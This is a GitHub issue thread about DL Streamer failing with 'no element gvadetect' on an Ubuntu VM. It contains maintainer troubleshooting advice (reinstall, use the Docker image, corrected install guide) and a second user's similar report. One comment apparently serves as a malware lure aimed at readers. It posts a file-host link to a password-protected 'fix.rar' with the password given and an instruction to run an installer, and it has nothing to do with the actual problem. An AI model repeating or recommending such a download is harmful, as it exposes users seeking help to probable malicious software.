### ISSUE TITLE
WARNING: erroneous pipeline: no element "gvadetect"

### ISSUE THREAD

**Issue by itemgroup** [dlstreamer/dlstreamer#431]
I am using the Ubuntu 22.04 on VM, the openvino version is  2024.3.0
After installing dlstreamer and openvino when i try to launch a pipeline I get the following error below. Can you please provide feedback to find a solution. Thank you very much.
I followed by the documentation(https://dlstreamer.github.io/index.html) step by step, but when i try to run the text , it hasn't worked successfully. Here is the detail:
kdf@kdf-virtual-machine:/$ gst-launch-1.0 filesrc location=${VIDEO_EXAMPLE} ! decodebin ! gvadetect model=${DETECTION_MODEL} model_proc=${DETECTION_MODEL_PROC} device=CPU ! queue ! gvawatermark ! videoconvert ! fpsdisplaysink video-sink=xvimagesink sync=false
WARNING: erroneous pipeline: no element "gvadetect"
kdf@kdf-virtual-machine:/$ echo ${DETECTION_MODEL}
/home/kdf/intel/dl_streamer/models/intel/person-vehicle-bike-detection-2004/FP32/person-vehicle-bike-detection-2004.xml
kdf@kdf-virtual-machine:/$ echo ${DETECTION_MODEL_PROC}
/home/kdf/intel/dlstreamer_gst/samples/gstreamer/model_proc/intel/person-vehicle-bike-detection-2004.json
kdf@kdf-virtual-machine:/$ echo ${VIDEO_EXAMPLE}
/home/kdf/Videos/person-bicycle-car-detection.mp4
Really appreciate！

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by itemgroup** [comment]
> Which of the options from the install guide (e.g. "https://dlstreamer.github.io/get_started/install/install_guide_ubuntu.html") have you followed? Would you have a chance to start new from a fresh and clean VM? Or try to uninstall DL-Streamer first (e.g. "https://dlstreamer.github.io/get_started/install/uninstall_guide_ubuntu.html").
> 
> Can you share the console output of the installation steps? Maybe there is something missing in your VM and not all install steps are successfull.
> 
> How does the hardware inside the VM look like? Some features might require an Intel-GPU, or an Intel-VPU or Intel-NPU, might even benefit from specific Intel-CPU-instruction-sets.

 I have tried option 1 yesterday but it doesn't work properly, and I remember it encountered the same issue.  So today I followed option 3,  it still have some troubles. 
I am sorry for not saving the console output,  i remember there was something wrong  but i fixed it successfully.
And this is the  details information of os
![Screenshot from 2024-08-27 14-02-29](https://github.com/user-attachments/assets/7bd1b2c0-a748-47e6-9f7b-20e113116814)

**Comment by pmalatyn** [comment]
hello, usually when we see this error "WARNING: erroneous pipeline: no element "gvadetect"" it means that installation wasn't successfull. I think that best would be to try one more time fresh installation (or usage of Docker image that we provide in option #2) and paying attention to any warnings or errors that may pop up during this procedure. If you will see anything please put it here. If in any case you installation will be w/o any errors or warnings please share with us full output of the console when running the sample pipeline. I hope that it will helps

**Comment by itemgroup** [comment]
> hello, usually when we see this error "WARNING: erroneous pipeline: no element "gvadetect"" it means that installation wasn't successfull. I think that best would be to try one more time fresh installation (or usage of Docker image that we provide in option #2) and paying attention to any warnings or errors that may pop up during this procedure. If you will see anything please put it here. If in any case you installation will be w/o any errors or warnings please share with us full output of the console when running the sample pipeline. I hope that it will helps

Thank you very much! I will rebuild it to confirm.

**Comment by antoniomtz** [comment]
I get the same error using the latest Docker image 2024.1.2-dev-ubuntu24 using the gvaattachroi sample: 

```
 # ./gvaattachroi_sample.sh "https://videos.pexels.com/video-files/1192116/1192116-sd_640_360_30fps.mp4" CPU file 100,150,200,300
MODELS_PATH: /home/dlstreamer/intel/dl_streamer/models
gst-launch-1.0 urisourcebin buffer-size=4096 uri=https://videos.pexels.com/video-files/1192116/1192116-sd_640_360_30fps.mp4 ! decodebin ! gvaattachroi roi=100,150,200,300 ! gvadetect inference-region=1 model=/home/dlstreamer/intel/dl_streamer/models/public/yolov8s/FP32/yolov8s.xml device=CPU pre-process-backend=ie ! queue ! gvawatermark ! videoconvertscale ! gvafpscounter ! vah264enc ! h264parse ! mp4mux ! filesink location=1192116-sd_640_360_30fps_CPU.mp4
WARNING: erroneous pipeline: no element "gvaattachroi"
```
Any ideas?

**Comment by pmalatyn** [comment]
there were issues with option 1, now install guide is corrected, you can try it: https://dlstreamer.github.io/get_started/install/install_guide_ubuntu.html

**Comment by pmalatyn** [comment]
I suppose that it worked, will close this issue then, please reopen in case if you will have any issues during installation
